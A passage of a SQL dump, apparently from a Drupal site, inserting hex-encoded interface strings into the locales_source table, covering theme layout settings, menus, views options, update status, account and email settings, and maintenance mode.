(1833, 0x546f6f6c7320746f20616964207468656d6520646576656c6f706d656e742e, '', '10.6.15'),
(1834, 0x5361766520657874656e73696f6e2073657474696e6773, '', '10.6.15'),
(1835, 0x457874656e73696f6e73, '', '10.6.15'),
(1836, 0x4c61796f7574, '', '10.6.15'),
(1837, 0x4f72646572, '', '10.6.15'),
(1838, 0x4869646520407469746c6520696e207468697320627265616b706f696e74, '', '10.6.15'),
(1839, 0x5375626665617475726573, '', '10.6.15'),
(1840, 0x4665617475726573, '', '10.6.15'),
(1841, 0x4d61696e, '', '10.6.15'),
(1842, 0x466f6f74657273, '', '10.6.15'),
(1843, 0x70616765202864656661756c7429, '', '10.6.15'),
(1844, 0x456e746572207468652074656d706c6174652073756767657374696f6e2e204f6e6c7920656e74657220746865206d6f6469666965722c20652e672e20666f722022706167652d2d66726f6e742220656e746572202266726f6e74222028776974686f75742071756f746573292e, '', '10.6.15'),
(1845, 0x5361766520746865206c61796f75742073657474696e67732e, '', '10.6.15'),
(1846, 0x416674657220736176696e67207468652073756767657374696f6e20636f6e6669677572652061206c61796f757420666f722069742e204966206e6f206c61796f7574206973207365742069742077696c6c20757365207468652064656661756c74206c61796f75742e, '', '10.6.15'),
(1847, 0x3c703e46696e6420706167652073756767657374696f6e73206279207475726e696e67206f6e2074686520446576656c20657874656e73696f6e20696e20416476616e6365642073657474696e677320616e6420656e61626c6520746865206f7074696f6e3a203c656d3e53686f7720506167652053756767657374696f6e733c2f656d3e2e2052656c6f61642061207061676520696e20746865207369746520616e64207468652073756767657374696f6e732077696c6c2062652073686f776e20696e20746865206d6573736167657320617265612e3c2f703e, '', '10.6.15'),
(1848, 0x416464206e65772073756767657374696f6e, '', '10.6.15'),
(1849, 0x53656c656374204c61796f757473, '', '10.6.15'),
(1850, 0x3c68333e4f7074696f6e733c2f68333e, '', '10.6.15'),
(1851, 0x3c656d3e5361766520746865206c61796f75742073657474696e677320746f206368616e67652074686520627265616b706f696e742067726f757020616e642075706461746520746865206c61796f757420627265616b706f696e74732e3c2f656d3e, '', '10.6.15'),
(1852, 0x427265616b706f696e7473, '', '10.6.15'),
(1853, 0x53656c6563742074686520627265616b706f696e742067726f75702e20596f75206d757374207361766520746865206c61796f75742073657474696e677320666f7220697420746f2074616b65206566666563742c207468656e207265636f6e66696775726520796f7572206c61796f7574732e, '', '10.6.15'),
(1854, 0x4f76657272696465206d61782d776964746873, '', '10.6.15'),
(1855, 0x556e6974, '', '10.6.15'),
(1856, 0x476c6f62616c206d6178207769647468, '', '10.6.15'),
(1857, 0x4f76657272696465206d61782d77696474682070657220726f77, '', '10.6.15'),
(1858, 0x6e6176626172, '', '10.6.15'),
(1859, 0x686967686c696768746564, '', '10.6.15'),
(1860, 0x6665617475726573, '', '10.6.15'),
(1861, 0x636f6e74656e7420707265666978, '', '10.6.15'),
(1862, 0x6d61696e, '', '10.6.15'),
(1863, 0x636f6e74656e7420737566666978, '', '10.6.15'),
(1864, 0x7375626665617475726573, '', '10.6.15'),
(1865, 0x6c6561646572626f617264, '', '10.6.15'),
(1866, 0x666f6f74657273, '', '10.6.15'),
(1867, 0x4d6178207769647468, '', '10.6.15'),
(1868, 0x4f766572726964652074686520676c6f62616c206d61782d776964746820616e642070657220726f772e, '', '10.6.15'),
(1869, 0x456e61626c65206261636b757073, '', '10.6.15'),
(1870, 0x4261636b757073, '', '10.6.15'),
(1871, 0x41646170746976657468656d652063616e206175746f6d61746963616c6c792073617665206261636b75707320666f7220706167652074656d706c6174657320616e6420796f7572207468656d657320696e666f2e796d6c2066696c652c2073696e636520626f7468206f662074686573652063616e206368616e6765207768656e20796f7520736176652061206c61796f75742e204261636b7570732061726520736176656420746f20796f7572207468656d657320226261636b75702220666f6c6465722e, '', '10.6.15'),
(1872, 0x4f7074696f6e73, '', '10.6.15'),
(1873, 0x53617665206c61796f75742073657474696e6773, '', '10.6.15'),
(1874, 0x4c61796f757473, '', '10.6.15'),
(1875, 0x5573657220706963747572657320696e20706f737473, '', '10.6.15'),
(1876, 0x5573657220706963747572657320696e20636f6d6d656e7473, '', '10.6.15'),
(1877, 0x5573657220766572696669636174696f6e2073746174757320696e20636f6d6d656e7473, '', '10.6.15'),
(1878, 0x53686f72746375742069636f6e, '', '10.6.15'),
(1879, 0x5061676520656c656d656e7420646973706c6179, '', '10.6.15'),
(1880, 0x55736520746865206c6f676f20737570706c69656420627920746865207468656d65, '', '10.6.15'),
(1881, 0x5061746820746f20637573746f6d206c6f676f, '', '10.6.15'),
(1882, 0x4578616d706c65733a203c636f64653e40696d706c696369742d7075626c69632d66696c653c2f636f64653e2028666f7220612066696c6520696e20746865207075626c69632066696c6573797374656d292c203c636f64653e406578706c696369742d66696c653c2f636f64653e2c206f72203c636f64653e406c6f63616c2d66696c653c2f636f64653e2e, '', '10.6.15'),
(1883, 0x55706c6f6164206c6f676f20696d616765, '', '10.6.15'),
(1884, 0x496620796f7520646f6e27742068617665206469726563742066696c652061636365737320746f20746865207365727665722c207573652074686973206669656c6420746f2075706c6f616420796f7572206c6f676f2e, '', '10.6.15'),
(1885, 0x4c6f676f20696d616765, '', '10.6.15'),
(1886, 0x557365207468652066617669636f6e20737570706c69656420627920746865207468656d65, '', '10.6.15'),
(1887, 0x5061746820746f20637573746f6d2069636f6e, '', '10.6.15'),
(1888, 0x55706c6f61642066617669636f6e20696d616765, '', '10.6.15'),
(1889, 0x496620796f7520646f6e27742068617665206469726563742066696c652061636365737320746f20746865207365727665722c207573652074686973206669656c6420746f2075706c6f616420796f75722073686f72746375742069636f6e2e, '', '10.6.15'),
(1890, 0x46617669636f6e, '', '10.6.15'),
(1891, 0x596f75722073686f72746375742069636f6e2c206f722066617669636f6e2c20697320646973706c6179656420696e2074686520616464726573732062617220616e6420626f6f6b6d61726b73206f66206d6f73742062726f77736572732e, '', '10.6.15'),
(1892, 0x536176652062617369632073657474696e6773, '', '10.6.15'),
(1893, 0x42617369632053657474696e6773, '', '10.6.15'),
(1894, 0x5468656d65205061746873, '', '10.6.15'),
(1895, 0x5468656d6520696e666f, '', '10.6.15'),
(1896, 0x5468656d6520496e666f, '', '10.6.15'),
(1897, 0x417070656172616e63652073657474696e6773, '', '10.6.15'),
(1898, 0x5468657365206f7074696f6e7320636f6e74726f6c2074686520646973706c61792073657474696e677320666f722074686520256e616d65207468656d652e205768656e20796f7572207369746520697320646973706c61796564207573696e672074686973207468656d652c2074686573652073657474696e67732077696c6c20626520757365642e, '', '10.6.15'),
(1899, 0x54686520666f6c6c6f77696e67203c623e4353533c2f623e2066696c657320776572652067656e65726174656420696e3a203c636f64653e4067656e6572617465645f66696c65735f706174683c2f636f64653e204073617665645f637373, '', '9.5.10'),
(1900, 0x54686520666f6c6c6f77696e67203c623e74656d706c617465733c2f623e20776572652067656e65726174656420696e3a203c636f64653e4074656d706c6174655f6469726563746f72793c2f636f64653e204073617665645f74656d706c61746573, '', '9.5.10'),
(1901, 0x4f7574206f662064617465, '', '10.6.15'),
(1902, 0x596f757220736974652069732063757272656e746c7920636f6e6669677572656420746f2073656e6420746865736520656d61696c73207768656e20616e7920757064617465732061726520617661696c61626c652e20546f20676574206e6f746966696564206f6e6c7920666f7220736563757269747920757064617465732c204075726c2e, '', '9.5.11'),
(1903, 0x596f7520617265206e6f7420617574686f72697a656420746f20616363657373207468697320706167652e, '', '9.5.11'),
(1904, 0x4163636573732064656e696564, '', '9.5.11'),
(1905, 0x434150544348412073657474696e6773, '', '10.6.15'),
(1906, 0x41646d696e697374657220434150544348412073657474696e6773, '', '10.6.15'),
(1907, 0x4f76657276696577206f662074686520617661696c61626c652043415054434841206368616c6c656e67652074797065732077697468206578616d706c657327, '', '10.6.15'),
(1908, 0x5468757273646179, '', '10.6.15'),
(1909, 0x30207365636f6e6473, '', '10.6.15'),
(1910, 0x436f6d70617469626c65, '', '10.6.15'),
(1911, 0x4d656e7520256c6162656c20686173206265656e20757064617465642e, '', '10.6.15'),
(1912, 0x4561636820626c6f636b20747970652068617320697473206f776e206669656c647320616e6420646973706c61792073657474696e67732e2043726561746520626c6f636b73206f6620656163682074797065206f6e20746865203c6120687265663d223a626c6f636b2d6c696272617279223e426c6f636b733c2f613e207061676520696e2074686520637573746f6d20626c6f636b206c6962726172792e, '', '9.5.10'),
(1913, 0x41646420637573746f6d20626c6f636b2074797065, '', '9.5.10'),
(1914, 0x6d656e75, '', '9.5.10'),
(1915, 0x406c616e677561676520286f726967696e616c29, '', '10.6.15'),
(1916, 0x5472616e736c6174696f6e7320666f7220256c6162656c, '', '10.6.15'),
(1917, 0x406c6162656c203c7370616e20636c6173733d2276697375616c6c792d68696464656e223e2840736f757263655f6c616e6775616765293c2f7370616e3e, '', '10.6.15'),
(1918, 0x28456d70747929, '', '10.6.15'),
(1919, 0x4d656e75206465736372697074696f6e, '', '9.5.10'),
(1920, 0x53617665207472616e736c6174696f6e, '', '10.6.15'),
(1921, 0x41646420406c616e6775616765207472616e736c6174696f6e20666f7220256c6162656c, '', '10.6.15'),
(1922, 0x546869732077696c6c20616c736f2072656d6f7665203120706c6163656420626c6f636b20696e7374616e63652e205468697320616374696f6e2063616e6e6f7420626520756e646f6e652e03546869732077696c6c20616c736f2072656d6f76652040636f756e7420706c6163656420626c6f636b20696e7374616e6365732e205468697320616374696f6e2063616e6e6f7420626520756e646f6e652e, '', '9.5.10'),
(1923, 0x4d656e75204e616d65, '', '9.5.10'),
(1924, 0x5765204d656761204d656e75, '', '9.5.10'),
(1925, 0x5461736b73, '', '10.6.15'),
(1926, 0x626c6f636b, '', '9.5.10'),
(1927, 0x41646d696e20696e666f, '', '9.5.10'),
(1928, 0x4564697420406c616e6775616765207472616e736c6174696f6e20666f7220256c6162656c, '', '10.6.15'),
(1929, 0x5375636365737366756c6c7920736176656420406c616e6775616765207472616e736c6174696f6e2e, '', '9.5.10'),
(1930, 0x5669657720626c6f636b, '', '9.5.10'),
(1931, 0x40636f756e74202864656661756c742073657474696e6729, '', '10.6.15'),
(1932, 0x4974656d732070657220626c6f636b, '', '10.6.15'),
(1933, 0x4f76657272696465207469746c65, '', '10.6.15'),
(1934, 0x4368616e67696e6720746865207469746c652068657265206d65616e732069742063616e6e6f742062652064796e616d6963616c6c7920616c746572656420616e796d6f72652e2028547279206368616e67696e67206974206469726563746c7920696e203c6120687265663d223a75726c223e406e616d653c2f613e2e29, '', '10.6.15'),
(1935, 0x76696577, 'View entity type', '10.6.15'),
(1936, 0x566965777320656e74697479206669656c642068616e646c6572, '', '10.6.15'),
(1937, 0x5265777269746520726573756c7473, '', '10.6.15'),
(1938, 0x456e74697479206c696e6b, '', '10.6.15'),
(1939, 0x4578706f736564206f7074696f6e73, '', '10.6.15'),
(1940, 0x5061676564206f75747075742c2066756c6c207061676572, '', '10.6.15'),
(1941, 0x4461746520736f7274206578706f73652073657474696e6773, '', '10.6.15'),
(1942, 0x4461746520736f7274, '', '10.6.15'),
(1943, 0x536f727473, '', '10.6.15'),
(1944, 0x4578706f7365, '', '10.6.15'),
(1945, 0x47726f7570, '', '10.6.15'),
(1946, 0x42756e646c65, '', '10.6.15'),
(1947, 0x46696c74657273, '', '10.6.15'),
(1948, 0x44656661756c7420646973706c6179206f7074696f6e73, '', '10.6.15'),
(1949, 0x426c6f636b20646973706c6179206f7074696f6e73, '', '10.6.15'),
(1950, 0x5061676520646973706c6179206f7074696f6e73, '', '10.6.15'),
(1951, 0x41646d696e697374726174697665206465736372697074696f6e, '', '10.6.15'),
(1952, 0x4120737472696e6720746f206964656e74696679207468652068616e646c657220696e7374616e636520696e207468652061646d696e2055492e, '', '10.6.15'),
(1953, 0x4372656174652061206c6162656c, '', '10.6.15'),
(1954, 0x536570617261746f72, '', '10.6.15'),
(1955, 0x4c696e6b2070617468, '', '10.6.15'),
(1956, 0x5469746c652074657874, '', '10.6.15'),
(1957, 0x5072656669782074657874, '', '10.6.15'),
(1958, 0x5375666669782074657874, '', '10.6.15'),
(1959, 0x4d6f7265206c696e6b206c6162656c, '', '10.6.15'),
(1960, 0x5465787420746f20646973706c6179, '', '10.6.15'),
(1961, 0x4e6578742070616765206c696e6b2074657874, '', '10.6.15'),
(1962, 0x50726576696f75732070616765206c696e6b2074657874, '', '10.6.15'),
(1963, 0x46697273742070616765206c696e6b2074657874, '', '10.6.15'),
(1964, 0x4c6173742070616765206c696e6b2074657874, '', '10.6.15'),
(1965, 0x4974656d73207065722070616765206c6162656c, '', '10.6.15'),
(1966, 0x416c6c206974656d73206c6162656c, '', '10.6.15'),
(1967, 0x4f6666736574206c6162656c, '', '10.6.15'),
(1968, 0x5375626d697420627574746f6e2074657874, '', '10.6.15'),
(1969, 0x526573657420627574746f6e206c6162656c, '', '10.6.15'),
(1970, 0x4578706f73656420736f727473206c6162656c, '', '10.6.15'),
(1971, 0x417363656e64696e67, '', '10.6.15'),
(1972, 0x44657363656e64696e67, '', '10.6.15'),
(1973, 0x54686973206e6f6465206973, '', '9.5.10'),
(1974, 0x436f6e6669672044727570616c2038204d656761204d656e75, '', '9.5.10'),
(1975, 0x53756e, '', '10.6.15'),
(1976, 0x5375636365737366756c6c79207570646174656420406c616e6775616765207472616e736c6174696f6e2e, '', '9.5.10'),
(1977, 0x406c616e6775616765207472616e736c6174696f6e20776173206e6f742061646465642e20546f206164642061207472616e736c6174696f6e2c20796f75206d757374206d6f646966792074686520636f6e66696775726174696f6e2e, '', '9.5.10'),
(1978, 0x53697465206c6f676f, '', '9.5.10'),
(1979, 0x446566696e6564206f6e20746865203c6120687265663d2240617070656172616e6365223e417070656172616e63652053657474696e67733c2f613e20706167652e, '', '9.5.10'),
(1980, 0x446566696e6564206f6e20746865203c6120687265663d223a696e666f726d6174696f6e223e5369746520496e666f726d6174696f6e3c2f613e20706167652e, '', '9.5.10'),
(1981, 0x546f67676c65206272616e64696e6720656c656d656e7473, '', '9.5.10'),
(1982, 0x43686f6f7365207768696368206272616e64696e6720656c656d656e747320796f752077616e7420746f2073686f7720696e207468697320626c6f636b20696e7374616e63652e, '', '9.5.10'),
(1983, 0x4564697420637573746f6d20626c6f636b20256c6162656c, '', '9.5.10'),
(1984, 0x546865726520617265207570646174657320617661696c61626c6520666f72206f6e65206f72206d6f7265206f6620796f7572206d6f64756c6573206f72207468656d65732e20546f20656e73757265207468652070726f7065722066756e6374696f6e696e67206f6620796f757220736974652c20796f752073686f756c642075706461746520617320736f6f6e20617320706f737369626c652e, '', '10.6.15'),
(1985, 0x53656520746865203c6120687265663d223a617661696c61626c655f75706461746573223e617661696c61626c6520757064617465733c2f613e207061676520666f72206d6f726520696e666f726d6174696f6e20616e6420746f20696e7374616c6c20796f7572206d697373696e6720757064617465732e, '', '9.5.11'),
(1986, 0x31206d6f6e74680340636f756e74206d6f6e746873, '', '9.5.11'),
(1987, 0x31207765656b0340636f756e74207765656b73, '', '9.5.11'),
(1988, 0x4e6f20617661696c61626c652072656c656173657320666f756e64, '', '9.5.11'),
(1989, 0x54686572652077617320612070726f626c656d20636865636b696e67203c6120687265663d223a7570646174652d7265706f7274223e617661696c61626c6520757064617465733c2f613e20666f722044727570616c2e, '', '9.5.11'),
(1990, 0x31207365636f6e640340636f756e74207365636f6e6473, '', '9.5.11'),
(1991, 0x456e74657220796f757220407320757365726e616d652e, '', '9.5.11'),
(1992, 0x50617373776f7264, '', '10.6.15'),
(1993, 0x456e746572207468652070617373776f72642074686174206163636f6d70616e69657320796f757220757365726e616d652e, '', '9.5.11'),
(1994, 0x4d617468207175657374696f6e, '', '9.5.11'),
(1995, 0x4078202b204079203d, '', '9.5.11'),
(1996, 0x536f6c766520746869732073696d706c65206d6174682070726f626c656d20616e6420656e7465722074686520726573756c742e20452e672e20666f7220312b332c20656e74657220342e, '', '10.6.15'),
(1997, 0x4c6f6720696e, '', '10.6.15'),
(1998, 0x437265617465206e6577206163636f756e74, '', '10.6.15'),
(1999, 0x526573657420796f75722070617373776f7264, '', '10.6.15'),
(2000, 0x4c61746573742076657273696f6e3a, '', '9.5.11'),
(2001, 0x55706c6f61642070726f6772657373, '', '9.5.11'),
(2002, 0x55706c6f61642070726f6772657373, '', '9.5.10'),
(2003, 0x44617461626173652073797374656d, '', '10.6.15'),
(2004, 0x44617461626173652073797374656d, '', '9.5.10'),
(2005, 0x4d6f64756c6520616e64207468656d652075706461746520737461747573, '', '9.5.11'),
(2006, 0x4744206c696272617279, '', '9.5.11'),
(2007, 0x5472616e736c6174696f6e2075706461746520737461747573, '', '9.5.11'),
(2008, 0x44727570616c20636f726520736563757269747920636f766572616765, '', '9.5.11'),
(2009, 0x44617461626173652049736f6c6174696f6e204c6576656c, '', '9.5.11'),
(2010, 0x4e6f646520416363657373205065726d697373696f6e73, '', '9.5.11'),
(2011, 0x44727570616c20636f72652075706461746520737461747573, '', '9.5.11'),
(2012, 0x53656172636820696e6465782070726f6772657373, '', '9.5.11'),
(2013, 0x5472757374656420486f73742053657474696e6773, '', '9.5.11'),
(2014, 0x557064617465206e6f74696669636174696f6e73, '', '9.5.11'),
(2015, 0x556e69636f6465206c696272617279, '', '10.6.15'),
(2016, 0x41636365737320746f207570646174652e706870, '', '9.5.11'),
(2017, 0x44657072656361746564207468656d657320656e61626c6564, '', '9.5.11'),
(2018, 0x57656220736572766572, '', '10.6.15'),
(2019, 0x456e746974792f6669656c6420646566696e6974696f6e73, '', '9.5.11'),
(2020, 0x504850, '', '10.6.15'),
(2021, 0x44617461626173652075706461746573, '', '9.5.11'),
(2022, 0x50485020657874656e73696f6e73, '', '10.6.15'),
(2023, 0x504850204f50636f64652063616368696e67, '', '9.5.11'),
(2024, 0x43726f6e206d61696e74656e616e6365207461736b73, '', '9.5.11'),
(2025, 0x50485020415043752063616368696e67, '', '9.5.11'),
(2026, 0x436f6e66696775726174696f6e2066696c6573, '', '9.5.11'),
(2027, 0x52616e646f6d206e756d6265722067656e65726174696f6e, '', '9.5.11'),
(2028, 0x504850206d656d6f7279206c696d6974, '', '10.6.15'),
(2029, 0x446174616261736520737570706f727420666f72204a534f4e, '', '10.6.15'),
(2030, 0x446174616261736520737570706f727420666f72204a534f4e, '', '9.5.10'),
(2031, 0x44617461626173652073797374656d2076657273696f6e, '', '10.6.15'),
(2032, 0x4f6e65206f72206d6f72652070726f626c656d732077657265206465746563746564207769746820796f75722044727570616c20696e7374616c6c6174696f6e2e20436865636b20746865203c6120687265663d223a737461747573223e737461747573207265706f72743c2f613e20666f72206d6f726520696e666f726d6174696f6e2e, '', '9.5.11'),
(2033, 0x436f6d7072657373206c61796f757420627920686964696e67206465736372697074696f6e732e, '', '10.6.15'),
(2034, 0x48696465206465736372697074696f6e73, '', '10.6.15'),
(2035, 0x45646974207468652077656c636f6d6520656d61696c206d657373616765732073656e7420746f206e6577206d656d626572206163636f756e7473206372656174656420627920616e2061646d696e6973747261746f722e, '', '9.5.10'),
(2036, 0x417661696c61626c65207661726961626c6573206172653a205b736974653a6e616d655d2c205b736974653a75726c5d2c205b757365723a646973706c61792d6e616d655d2c205b757365723a6163636f756e742d6e616d655d2c205b757365723a6d61696c5d2c205b736974653a6c6f67696e2d75726c5d2c205b736974653a75726c2d62726965665d2c205b757365723a656469742d75726c5d2c205b757365723a6f6e652d74696d652d6c6f67696e2d75726c5d2c205b757365723a63616e63656c2d75726c5d2e, '', '9.5.10'),
(2037, 0x45646974207468652077656c636f6d6520656d61696c206d657373616765732073656e7420746f206e6577206d656d626572732075706f6e207265676973746572696e672c207768656e2061646d696e69737472617469766520617070726f76616c2069732072657175697265642e, '', '9.5.10'),
(2038, 0x456469742074686520656d61696c206e6f74696679696e672074686520736974652061646d696e6973747261746f72207468617420746865726520617265206e6577206d656d62657273206177616974696e672061646d696e69737472617469766520617070726f76616c2e, '', '9.5.10'),
(2039, 0x45646974207468652077656c636f6d6520656d61696c206d657373616765732073656e7420746f206e6577206d656d626572732075706f6e207265676973746572696e672c207768656e206e6f2061646d696e6973747261746f7220617070726f76616c2069732072657175697265642e, '', '9.5.10'),
(2040, 0x456469742074686520656d61696c206d657373616765732073656e7420746f2075736572732077686f20726571756573742061206e65772070617373776f72642e, '', '9.5.10'),
(2041, 0x456e61626c6520616e64206564697420656d61696c206d657373616765732073656e7420746f2075736572732075706f6e206163636f756e742061637469766174696f6e20287768656e20616e2061646d696e6973747261746f722061637469766174657320616e206163636f756e74206f66206120757365722077686f2068617320616c726561647920726567697374657265642c206f6e206120736974652077686572652061646d696e69737472617469766520617070726f76616c206973207265717569726564292e, '', '9.5.10'),
(2042, 0x456e61626c6520616e64206564697420656d61696c206d657373616765732073656e7420746f207573657273207768656e207468656972206163636f756e74732061726520626c6f636b65642e, '', '9.5.10'),
(2043, 0x456469742074686520656d61696c206d657373616765732073656e7420746f207573657273207768656e207468657920617474656d707420746f2063616e63656c207468656972206163636f756e74732e, '', '9.5.10'),
(2044, 0x456e61626c6520616e64206564697420656d61696c206d657373616765732073656e7420746f207573657273207768656e207468656972206163636f756e7473206172652063616e63656c65642e, '', '9.5.10'),
(2045, 0x546865206c697374206f6620617661696c61626c6520746f6b656e7320746861742063616e206265207573656420696e20652d6d61696c732069732070726f76696465642062656c6f772e, '', '9.5.10'),
(2046, 0x54686520656d61696c206164647265737320746f206265207573656420617320746865202766726f6d27206164647265737320666f7220616c6c206163636f756e74206e6f74696669636174696f6e73206c69737465642062656c6f772e204966203c656d3e2756697369746f72732c206275742061646d696e6973747261746f7220617070726f76616c206973207265717569726564273c2f656d3e2069732073656c65637465642061626f76652c2061206e6f74696669636174696f6e20656d61696c2077696c6c20616c736f2062652073656e7420746f2074686973206164647265737320666f7220616e79206e657720726567697374726174696f6e732e204c6561766520656d70747920746f20757365207468652064656661756c742073797374656d20656d61696c2061646472657373203c656d3e2825736974652d656d61696c292e3c2f656d3e, '', '9.5.10'),
(2047, 0x456e61626c652074686520706572736f6e616c20636f6e7461637420666f726d2062792064656661756c7420666f72206e6577207573657273, '', '9.5.10'),
(2048, 0x4368616e67696e6720746869732073657474696e672077696c6c206e6f7420616666656374206578697374696e672075736572732e, '', '9.5.10'),
(2049, 0x436f6e746163742073657474696e6773, '', '9.5.11'),
(2050, 0x546865206e616d65207573656420746f20696e64696361746520616e6f6e796d6f75732075736572732e, '', '9.5.10'),
(2051, 0x416e6f6e796d6f7573207573657273, '', '9.5.10'),
(2052, 0x41646d696e6973747261746f7273206f6e6c79, '', '9.5.10'),
(2053, 0x56697369746f7273, '', '9.5.10'),
(2054, 0x56697369746f72732c206275742061646d696e6973747261746f7220617070726f76616c206973207265717569726564, '', '9.5.10'),
(2055, 0x57686f2063616e207265676973746572206163636f756e74733f, '', '9.5.10'),
(2056, 0x5265717569726520656d61696c20766572696669636174696f6e207768656e20612076697369746f72206372656174657320616e206163636f756e74, '', '9.5.10'),
(2057, 0x4e65772075736572732077696c6c20626520726571756972656420746f2076616c696461746520746865697220656d61696c2061646472657373207072696f7220746f206c6f6767696e6720696e746f2074686520736974652c20616e642077696c6c2062652061737369676e656420612073797374656d2d67656e6572617465642070617373776f72642e205769746820746869732073657474696e672064697361626c65642c2075736572732077696c6c206265206c6f6767656420696e20696d6d6564696174656c792075706f6e207265676973746572696e672c20616e64206d61792073656c656374207468656972206f776e2070617373776f72647320647572696e6720726567697374726174696f6e2e, '', '9.5.10'),
(2058, 0x456e61626c652070617373776f726420737472656e67746820696e64696361746f72, '', '9.5.10'),
(2059, 0x44697361626c6520746865206163636f756e7420616e64206b6565702069747320636f6e74656e742e, '', '9.5.10'),
(2060, 0x44697361626c6520746865206163636f756e7420616e6420756e7075626c6973682069747320636f6e74656e742e, '', '9.5.10'),
(2061, 0x44656c65746520746865206163636f756e7420616e64206d616b652069747320636f6e74656e742062656c6f6e6720746f207468652025616e6f6e796d6f75732d6e616d6520757365722e205468697320616374696f6e2063616e6e6f7420626520756e646f6e652e, '', '9.5.10'),
(2062, 0x5768656e2063616e63656c6c696e6720612075736572206163636f756e74, '', '9.5.10'),
(2063, 0x5573657273207769746820746865202573656c6563742d63616e63656c2d6d6574686f64206f72202561646d696e69737465722d7573657273203c6120687265663d223a7065726d697373696f6e732d75726c223e7065726d697373696f6e733c2f613e2063616e206f7665727269646520746869732064656661756c74206d6574686f642e, '', '9.5.10'),
(2064, 0x53656c656374206d6574686f6420666f722063616e63656c6c696e67206163636f756e74, '', '9.5.10'),
(2065, 0x41646d696e6973746572207573657273, '', '9.5.10'),
(2066, 0x526567697374726174696f6e20616e642063616e63656c6c6174696f6e, '', '9.5.10'),
(2067, 0x4e6f74696669636174696f6e20656d61696c2061646472657373, '', '9.5.10'),
(2068, 0x57656c636f6d6520286e6577207573657220637265617465642062792061646d696e6973747261746f7229, '', '9.5.10'),
(2069, 0x57656c636f6d6520286177616974696e6720617070726f76616c29, '', '9.5.10'),
(2070, 0x41646d696e202875736572206177616974696e6720617070726f76616c29, '', '9.5.10'),
(2071, 0x57656c636f6d6520286e6f20617070726f76616c20726571756972656429, '', '9.5.10'),
(2072, 0x4e6f746966792075736572207768656e206163636f756e7420697320616374697661746564, '', '9.5.10'),
(2073, 0x4163636f756e742061637469766174696f6e, '', '9.5.10'),
(2074, 0x4e6f746966792075736572207768656e206163636f756e7420697320626c6f636b6564, '', '9.5.10'),
(2075, 0x4163636f756e7420626c6f636b6564, '', '9.5.10'),
(2076, 0x4163636f756e742063616e63656c6c6174696f6e20636f6e6669726d6174696f6e, '', '9.5.10'),
(2077, 0x4e6f746966792075736572207768656e206163636f756e742069732063616e63656c6564, '', '9.5.10'),
(2078, 0x4163636f756e742063616e63656c6564, '', '9.5.10'),
(2079, 0x50617373776f7264207265636f76657279, '', '9.5.10'),
(2080, 0x456d61696c73, '', '9.5.10'),
(2081, 0x54686520636f6e66696775726174696f6e206f7074696f6e732068617665206265656e2073617665642e, '', '9.5.11'),
(2082, 0x55706461746520617661696c61626c65, '', '10.6.15'),
(2083, 0x5761726e696e67, '', '10.6.15'),
(2084, 0x5265636f6d6d656e6465642076657273696f6e3a, '', '10.6.15'),
(2085, 0x5573652074686973207574696c69747920746f2075706461746520796f7572206461746162617365207768656e657665722061206e65772072656c65617365206f662044727570616c206f722061206d6f64756c6520697320696e7374616c6c65642e, '', '9.5.11'),
(2086, 0x466f72206d6f72652064657461696c656420696e666f726d6174696f6e2c2073656520746865203c6120687265663d2268747470733a2f2f7777772e64727570616c2e6f72672f646f63732f7570646174696e672d64727570616c223e5570646174696e672044727570616c2067756964653c2f613e2e20496620796f752061726520756e737572652077686174207468657365207465726d73206d65616e20796f752073686f756c642070726f6261626c7920636f6e7461637420796f757220686f7374696e672070726f76696465722e, '', '10.6.15'),
(2087, 0x5768656e20796f75206861766520706572666f726d6564207468652073746570732061626f76652c20796f75206d61792070726f636565642e, '', '10.6.15'),
(2088, 0x44727570616c20646174616261736520757064617465, '', '10.6.15'),
(2089, 0x496e7374616c6c6174696f6e207461736b73, '', '10.6.15'),
(2090, 0x56657269667920726571756972656d656e7473, '', '10.6.15'),
(2091, 0x646f6e65, '', '10.6.15'),
(2092, 0x4f76657276696577, '', '10.6.15'),
(2093, 0x616374697665, '', '10.6.15'),
(2094, 0x5265766965772075706461746573, '', '10.6.15'),
(2095, 0x526576696577206c6f67, '', '10.6.15');
INSERT INTO `locales_source` (`lid`, `source`, `context`, `version`) VALUES
(2096, 0x3c7374726f6e673e4261636b20757020796f757220636f64653c2f7374726f6e673e2e2048696e743a207768656e206261636b696e67207570206d6f64756c6520636f64652c20646f206e6f74206c656176652074686174206261636b757020696e2074686520276d6f64756c657327206f72202773697465732f2a2f6d6f64756c657327206469726563746f726965732061732074686973206d617920636f6e667573652044727570616c2773206175746f2d646973636f76657279206d656368616e69736d2e, '', '10.6.15'),
(2097, 0x50757420796f7572207369746520696e746f203c6120687265663d223a75726c223e6d61696e74656e616e6365206d6f64653c2f613e2e, '', '10.6.15'),
(2098, 0x3c7374726f6e673e4261636b20757020796f75722064617461626173653c2f7374726f6e673e2e20546869732070726f636573732077696c6c206368616e676520796f75722064617461626173652076616c75657320616e6420696e2063617365206f6620656d657267656e637920796f75206d6179206e65656420746f2072657665727420746f2061206261636b75702e, '', '10.6.15'),
(2099, 0x496e7374616c6c20796f7572206e65772066696c657320696e2074686520617070726f707269617465206c6f636174696f6e2c2061732064657363726962656420696e207468652068616e64626f6f6b2e, '', '9.5.11'),
(2100, 0x4e6f2070656e64696e6720757064617465732e, '', '10.6.15'),
(2101, 0x46726f6e742070616765, '', '10.6.15'),
(2102, 0x41646d696e697374726174696f6e207061676573, '', '10.6.15'),
(2103, 0x507574207369746520696e746f206d61696e74656e616e6365206d6f6465, '', '9.5.11'),
(2104, 0x56697369746f72732077696c6c206f6e6c792073656520746865206d61696e74656e616e6365206d6f6465206d6573736167652e204f6e6c792075736572732077697468207468652022407065726d697373696f6e2d6c6162656c22203c6120687265663d223a7065726d697373696f6e732d75726c223e7065726d697373696f6e3c2f613e2077696c6c2062652061626c6520746f206163636573732074686520736974652e20417574686f72697a65642075736572732063616e206c6f6720696e206469726563746c792076696120746865203c6120687265663d223a757365722d6c6f67696e223e75736572206c6f67696e3c2f613e20706167652e, '', '9.5.11'),
(2105, 0x55736520746865207369746520696e206d61696e74656e616e6365206d6f6465, '', '9.5.11'),
(2106, 0x4d65737361676520746f20646973706c6179207768656e20696e206d61696e74656e616e6365206d6f6465, '', '9.5.11'),
(2107, 0x53797374656d206d61696e74656e616e6365, '', '9.5.11'),
(2108, 0x417567757374, 'Long month name', '10.6.15'),
(2109, 0x4d656761204d656e75, '', '10.6.15'),
(2110, 0x4d656761204d656e7520436f6e666967757265, '', '10.6.15'),
(2111, 0x4d616e616765204d656761204d656e75, '', '9.5.10'),
(2112, 0x636f6e74656e742074797065, '', '9.5.10'),
(2113, 0x6e6f2070726576696577, '', '9.5.10'),
